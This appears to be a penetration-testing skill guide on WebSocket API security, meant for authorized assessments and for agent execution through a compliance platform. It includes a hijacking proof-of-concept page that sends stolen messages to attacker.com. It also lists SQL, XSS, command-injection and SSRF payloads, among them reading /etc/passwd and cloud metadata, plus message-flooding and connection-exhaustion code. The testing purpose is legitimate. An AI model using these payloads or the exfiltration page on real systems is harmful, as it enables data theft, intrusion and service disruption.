Testing WebSocket API Security
When to Use
- Assessing real-time communication APIs that use WebSocket (ws://) or Secure WebSocket (wss://) protocols
- Testing for Cross-Site WebSocket Hijacking (CSWSH) where an attacker's page connects to a legitimate WebSocket server
- Evaluating authentication and authorization enforcement on WebSocket connections and messages
- Testing input validation on WebSocket message payloads for injection vulnerabilities
- Assessing WebSocket implementations for denial-of-service through message flooding or oversized frames
Do not use without written authorization. WebSocket testing may disrupt real-time services and affect other connected users.
Prerequisites
- Written authorization specifying the WebSocket endpoint and testing scope
- Burp Suite Professional with WebSocket interception capability
- Python 3.10+ with
websocketsandasynciolibraries - Browser developer tools for observing WebSocket handshakes and frames
- wscat CLI tool for manual WebSocket interaction:
npm install -g wscat - Knowledge of the WebSocket subprotocol in use (JSON-RPC, STOMP, custom)
Workflow
Step 1: WebSocket Endpoint Discovery and Handshake Analysis
import asyncio
import websockets
import json
import ssl
import time
WS_URL = "wss://target-api.example.com/ws"
AUTH_TOKEN = "Bearer <token>"
# Capture and analyze the WebSocket handshake
async def analyze_handshake():
"""Analyze WebSocket upgrade request and response headers."""
try:
async with websockets.connect(
WS_URL,
extra_headers={"Authorization": AUTH_TOKEN},
ssl=ssl.create_default_context()
) as ws:
print(f"Connected to: {WS_URL}")
print(f"Protocol: {ws.subprotocol}")
print(f"Extensions: {ws.extensions}")
# Send a test message
test_msg = json.dumps({"type": "ping"})
await ws.send(test_msg)
response = await asyncio.wait_for(ws.recv(), timeout=5)
print(f"Server response: {response}")
return True
except websockets.exceptions.InvalidStatusCode as e:
print(f"Connection rejected: {e.status_code}")
return False
except Exception as e:
print(f"Connection error: {e}")
return False
asyncio.run(analyze_handshake())
Step 2: Authentication and Authorization Testing
async def test_ws_authentication():
"""Test if WebSocket requires authentication."""
results = []
# Test 1: Connect without any authentication
try:
async with websockets.connect(WS_URL) as ws:
await ws.send(json.dumps({"type": "get_user_data"}))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
results.append({
"test": "No authentication",
"status": "VULNERABLE",
"response": resp[:200]
})
print(f"[VULN] WebSocket accessible without authentication")
except websockets.exceptions.InvalidStatusCode:
results.append({"test": "No authentication", "status": "SECURE"})
except Exception as e:
results.append({"test": "No authentication", "status": f"ERROR: {e}"})
# Test 2: Connect with invalid token
try:
async with websockets.connect(WS_URL,
extra_headers={"Authorization": "Bearer invalid_token"}) as ws:
await ws.send(json.dumps({"type": "get_user_data"}))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
results.append({
"test": "Invalid token",
"status": "VULNERABLE",
"response": resp[:200]
})
except websockets.exceptions.InvalidStatusCode:
results.append({"test": "Invalid token", "status": "SECURE"})
except Exception as e:
results.append({"test": "Invalid token", "status": f"ERROR: {e}"})
# Test 3: Connect with expired token
expired_token = "Bearer eyJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MDAwMDAwMDB9.expired"
try:
async with websockets.connect(WS_URL,
extra_headers={"Authorization": expired_token}) as ws:
await ws.send(json.dumps({"type": "get_user_data"}))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
results.append({"test": "Expired token", "status": "VULNERABLE"})
except (websockets.exceptions.InvalidStatusCode, Exception):
results.append({"test": "Expired token", "status": "SECURE"})
# Test 4: Token in query parameter (leakage risk)
try:
async with websockets.connect(f"{WS_URL}?token={AUTH_TOKEN}") as ws:
await ws.send(json.dumps({"type": "ping"}))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
results.append({
"test": "Token in URL",
"status": "INFO - Token accepted in query parameter (may leak in logs)"
})
except Exception:
results.append({"test": "Token in URL", "status": "REJECTED"})
for r in results:
print(f" [{r['status'][:10]}] {r['test']}")
return results
asyncio.run(test_ws_authentication())
Step 3: Cross-Site WebSocket Hijacking (CSWSH) Testing
async def test_cswsh():
"""Test for Cross-Site WebSocket Hijacking vulnerability."""
# CSWSH occurs when the WebSocket server does not validate the Origin header
# An attacker's website can connect to the legitimate WebSocket and steal data
origins_to_test = [
None, # No Origin header
"https://evil.com", # Attacker domain
"https://target-api.example.com.evil.com", # Subdomain confusion
"null", # Null origin (sandboxed iframe)
"https://target-api.example.com", # Legitimate origin
"http://target-api.example.com", # HTTP downgrade
]
print("=== CSWSH Testing ===\n")
for origin in origins_to_test:
try:
headers = {"Authorization": AUTH_TOKEN}
if origin:
headers["Origin"] = origin
async with websockets.connect(WS_URL, extra_headers=headers) as ws:
# Try to receive data that should be restricted
await ws.send(json.dumps({"type": "get_messages"}))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
if origin and origin != "https://target-api.example.com":
print(f"[CSWSH] Origin '{origin}' -> ACCEPTED (data received)")
else:
print(f"[OK] Origin '{origin}' -> Accepted (legitimate)")
except websockets.exceptions.InvalidStatusCode as e:
print(f"[BLOCKED] Origin '{origin}' -> Rejected ({e.status_code})")
except Exception as e:
print(f"[ERROR] Origin '{origin}' -> {e}")
asyncio.run(test_cswsh())
# PoC HTML page for CSWSH exploitation
CSWSH_POC = """
<!DOCTYPE html>
<html>
<head><title>CSWSH PoC</title></head>
<body>
<script>
// This page, hosted on attacker.com, connects to the target WebSocket
// If the server doesn't validate Origin, the victim's browser will
// send cookies/credentials and the attacker receives the data
var ws = new WebSocket("wss://target-api.example.com/ws");
ws.onopen = function() {
console.log("Connected to target WebSocket");
ws.send(JSON.stringify({type: "get_messages"}));
ws.send(JSON.stringify({type: "get_user_data"}));
};
ws.onmessage = function(event) {
console.log("Stolen data:", event.data);
// Exfiltrate to attacker server
fetch("https://attacker.com/collect", {
method: "POST",
body: event.data
});
};
</script>
<p>Loading... (CSWSH attack in progress)</p>
</body>
</html>
"""
Step 4: WebSocket Message Injection Testing
async def test_ws_injection():
"""Test WebSocket messages for injection vulnerabilities."""
INJECTION_PAYLOADS = {
"sql": [
{"type": "search", "query": "' OR '1'='1"},
{"type": "search", "query": "'; DROP TABLE messages;--"},
{"type": "get_message", "id": "1 UNION SELECT username,password FROM users--"},
],
"nosql": [
{"type": "search", "query": {"$ne": ""}},
{"type": "get_user", "filter": {"$gt": ""}},
],
"xss": [
{"type": "send_message", "content": "<script>alert('xss')</script>"},
{"type": "send_message", "content": "<img src=x onerror=alert(1)>"},
{"type": "update_name", "name": "Test<script>document.location='https://evil.com'</script>"},
],
"command": [
{"type": "process", "file": "test; cat /etc/passwd"},
{"type": "convert", "input": "test | id"},
],
"ssrf": [
{"type": "load_url", "url": "http://169.254.169.254/latest/meta-data/"},
{"type": "webhook", "callback": "http://localhost:6379/"},
],
"overflow": [
{"type": "send_message", "content": "A" * 100000},
{"type": "search", "query": "B" * 1000000},
],
}
async with websockets.connect(WS_URL,
extra_headers={"Authorization": AUTH_TOKEN}) as ws:
for category, payloads in INJECTION_PAYLOADS.items():
for payload in payloads:
try:
await ws.send(json.dumps(payload))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
# Analyze response for injection indicators
resp_lower = resp.lower()
indicators = []
if any(kw in resp_lower for kw in ["sql", "syntax", "mysql", "postgresql"]):
indicators.append("SQL error")
if any(kw in resp_lower for kw in ["root:", "uid=", "etc/passwd"]):
indicators.append("Command output")
if any(kw in resp_lower for kw in ["ami-id", "instance-id", "metadata"]):
indicators.append("SSRF data")
if "script" in resp_lower and "xss" not in category:
indicators.append("Reflected XSS")
if indicators:
print(f"[{category.upper()}] {json.dumps(payload)[:60]} -> {indicators}")
elif len(resp) > 10000:
print(f"[OVERFLOW] Large response: {len(resp)} bytes")
except asyncio.TimeoutError:
pass
except websockets.exceptions.ConnectionClosed:
print(f"[CRASH] Connection closed after {category} payload")
# Reconnect
break
asyncio.run(test_ws_injection())
Step 5: Denial-of-Service Testing
async def test_ws_dos():
"""Test WebSocket for DoS vulnerabilities."""
print("=== WebSocket DoS Testing ===\n")
# Test 1: Message flooding
async def flood_test():
async with websockets.connect(WS_URL,
extra_headers={"Authorization": AUTH_TOKEN}) as ws:
count = 0
start = time.time()
for i in range(10000):
try:
await ws.send(json.dumps({"type": "ping", "id": i}))
count += 1
except websockets.exceptions.ConnectionClosed:
break
elapsed = time.time() - start
print(f" Flood test: {count} messages in {elapsed:.1f}s ({count/elapsed:.0f} msg/s)")
await flood_test()
# Test 2: Large message
async def large_message_test():
sizes = [1024, 10240, 102400, 1024000, 10240000] # 1KB to 10MB
async with websockets.connect(WS_URL,
extra_headers={"Authorization": AUTH_TOKEN},
max_size=20*1024*1024) as ws:
for size in sizes:
try:
large_msg = json.dumps({"type": "data", "payload": "A" * size})
await ws.send(large_msg)
resp = await asyncio.wait_for(ws.recv(), timeout=5)
print(f" Large message ({size} bytes): Accepted")
except (websockets.exceptions.ConnectionClosed, asyncio.TimeoutError) as e:
print(f" Large message ({size} bytes): Rejected/Disconnected")
break
await large_message_test()
# Test 3: Connection exhaustion
async def connection_exhaustion():
connections = []
for i in range(100):
try:
ws = await websockets.connect(WS_URL,
extra_headers={"Authorization": AUTH_TOKEN})
connections.append(ws)
except Exception:
break
print(f" Connection exhaustion: {len(connections)} concurrent connections established")
for ws in connections:
await ws.close()
await connection_exhaustion()
asyncio.run(test_ws_dos())
Key Concepts
| Term | Definition |
|---|---|
| WebSocket | Full-duplex communication protocol over a single TCP connection, established via HTTP upgrade handshake |
| CSWSH | Cross-Site WebSocket Hijacking - an attack where a malicious website initiates a WebSocket connection to a legitimate server using the victim's browser credentials |
| Origin Validation | Server-side check of the Origin header during WebSocket handshake to prevent CSWSH by rejecting connections from unauthorized domains |
| WebSocket Frame | The basic unit of data in WebSocket communication, containing opcode, masking, payload length, and payload data |
| Upgrade Handshake | HTTP request with Upgrade: websocket and Connection: Upgrade headers that establishes the WebSocket connection |
| Message Flooding | Sending a large volume of WebSocket messages to exhaust server resources (memory, CPU, bandwidth) |
Tools & Systems
- Burp Suite Professional: Intercepts WebSocket handshakes and messages, allows message modification and replay
- OWASP ZAP: WebSocket testing with message fuzzing, interception, and breakpoint capabilities
- wscat: Command-line WebSocket client for manual testing:
wscat -c wss://target.com/ws -H "Authorization: Bearer token" - websocat: Advanced CLI WebSocket tool with proxy, broadcast, and scripting capabilities
- Autobahn TestSuite: Comprehensive WebSocket protocol compliance and security testing framework
Common Scenarios
Scenario: Chat Application WebSocket Security Assessment
Context: A messaging application uses WebSocket for real-time chat. The WebSocket endpoint handles message delivery, typing indicators, read receipts, and user presence. Authentication is cookie-based.
Approach:
- Analyze the WebSocket handshake: connection established at
wss://chat.example.com/wswith session cookie authentication - Test CSWSH: WebSocket server does not validate the Origin header - an attacker's page can connect and receive the victim's messages
- Test authentication: WebSocket accepts connections with expired session cookies (session validation only at handshake, not for subsequent messages)
- Test authorization: User A can send messages to private channels they are not a member of by crafting the channel ID
- Test injection: Message content is stored without sanitization; XSS payload in message body executes in other users' browsers
- Test message flooding: Server accepts 5000 messages per second without rate limiting, causing CPU spike
- Find that WebSocket messages include the sender's internal user ID, email, and IP address (information leakage)
Pitfalls:
- Not testing CSWSH because the application uses token-based authentication (cookies are automatically sent with WebSocket)
- Only testing the initial handshake authentication without verifying ongoing message authorization
- Missing injection vulnerabilities because payloads are in JSON WebSocket frames instead of HTTP parameters
- Not testing reconnection behavior (does the server re-validate authentication on reconnect?)
- Ignoring that WebSocket connections may bypass HTTP-level rate limiting and WAF rules
Output Format
## Finding: Cross-Site WebSocket Hijacking Enables Real-Time Data Theft
**ID**: API-WS-001
**Severity**: High (CVSS 8.1)
**Affected Endpoint**: wss://chat.example.com/ws
**Description**:
The WebSocket server does not validate the Origin header during the
handshake. An attacker can host a malicious web page that opens a
WebSocket connection to the chat server using the victim's session
cookie. All messages, typing indicators, and presence data are
forwarded to the attacker in real time.
**Proof of Concept**:
Host the CSWSH PoC page on attacker.com. When a logged-in user
visits the page, the JavaScript establishes a WebSocket connection
to the chat server. The server authenticates the connection using
the victim's cookie and delivers all real-time chat data to the
attacker's connection.
**Impact**:
Real-time interception of all private messages, presence data,
and typing indicators for any user who visits the attacker's page.
**Remediation**:
1. Validate the Origin header against an allowlist of legitimate domains
2. Implement CSRF tokens in the WebSocket handshake URL
3. Use token-based authentication (Authorization header) instead of cookies for WebSocket
4. Implement per-message authorization checks, not just connection-level authentication
5. Add rate limiting on WebSocket message volume per connection
Verification Criteria
Confirm successful execution by validating:
- [ ] All prerequisite tools and access requirements are satisfied
- [ ] Each workflow step completed without errors
- [ ] Output matches expected format and contains expected data
- [ ] No security warnings or misconfigurations detected
- [ ] Results are documented and evidence is preserved for audit
Compliance Framework Mapping
This skill supports compliance evidence collection across multiple frameworks:
- SOC 2: CC6.1 (Logical Access), CC6.6 (System Boundaries)
- ISO 27001: A.14.1 (Security Requirements), A.9.4 (System Access Control)
- NIST 800-53: AC-3 (Access Enforcement), SI-10 (Input Validation), SC-8 (Transmission Confidentiality)
- OWASP LLM Top 10: LLM06 (Excessive Agency), LLM08 (Excessive Autonomy)
Claw GRC Tip: When this skill is executed by a registered agent, compliance evidence is automatically captured and mapped to the relevant controls in your active frameworks.
Deploying This Skill with Claw GRC
Agent Execution
Register this skill with your Claw GRC agent for automated execution:
# Install via CLI
npx claw-grc skills add testing-websocket-api-security
# Or load dynamically via MCP
grc.load_skill("testing-websocket-api-security")
Audit Trail Integration
When executed through Claw GRC, every step of this skill generates tamper-evident audit records:
- SHA-256 chain hashing ensures no step can be modified after execution
- Evidence artifacts (configs, scan results, logs) are automatically attached to relevant controls
- Trust score impact — successful execution increases your agent's trust score
Continuous Compliance
Schedule this skill for recurring execution to maintain continuous compliance posture. Claw GRC monitors for drift and alerts when re-execution is needed.